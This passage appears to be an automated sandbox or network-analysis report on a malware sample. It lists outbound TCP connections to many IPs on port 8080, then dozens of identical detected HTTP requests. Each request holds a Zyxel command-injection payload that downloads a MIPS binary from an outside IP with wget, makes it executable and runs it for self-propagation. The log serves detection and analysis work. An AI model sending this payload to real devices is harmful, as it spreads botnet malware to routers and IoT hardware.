            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 217.166.14.199:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 92.235.249.162:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 20.214.240.240:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 125.172.27.98:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 134.25.114.170:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 5.230.78.58:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 91.14.20.185:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 123.231.1.67:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 168.26.51.167:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 87.32.172.63:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 108.45.80.251:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 164.84.110.181:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 93.118.131.92:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 114.246.218.160:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 25.255.84.4:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 110.147.129.188:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 219.81.41.34:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 34.233.105.210:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 189.48.225.105:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 116.170.199.239:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 83.97.147.158:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 132.170.105.182:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 49.2.102.142:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 112.157.21.198:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 1.237.212.120:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 189.96.192.32:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 102.3.112.233:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 193.85.121.168:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 98.110.226.200:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 130.168.0.145:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 134.216.117.138:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 83.30.66.1:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 62.40.136.235:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 1.184.77.44:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 182.176.131.73:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 166.9.156.171:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 47.196.32.147:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 105.210.149.139:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 39.13.92.87:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 61.185.198.203:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 50.108.73.242:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 201.45.95.194:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 143.78.127.42:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 59.200.193.190:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 186.207.114.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 164.185.117.255:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 191.253.108.246:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 57.142.166.194:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 88.201.194.218:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 85.55.178.217:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 136.114.0.222:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 61.223.217.204:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 75.211.204.146:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 90.240.152.128:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 129.4.118.173:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 209.146.199.61:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 218.158.48.223:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 111.2.106.113:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 107.42.116.22:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 158.127.58.149:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 148.215.198.29:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 73.247.63.133:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 209.167.118.221:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 213.93.114.82:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 61.9.36.238:8080
            Source: global trafficTCP traffic: 192.168.2.14:10168 -> 48.201.70.121:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
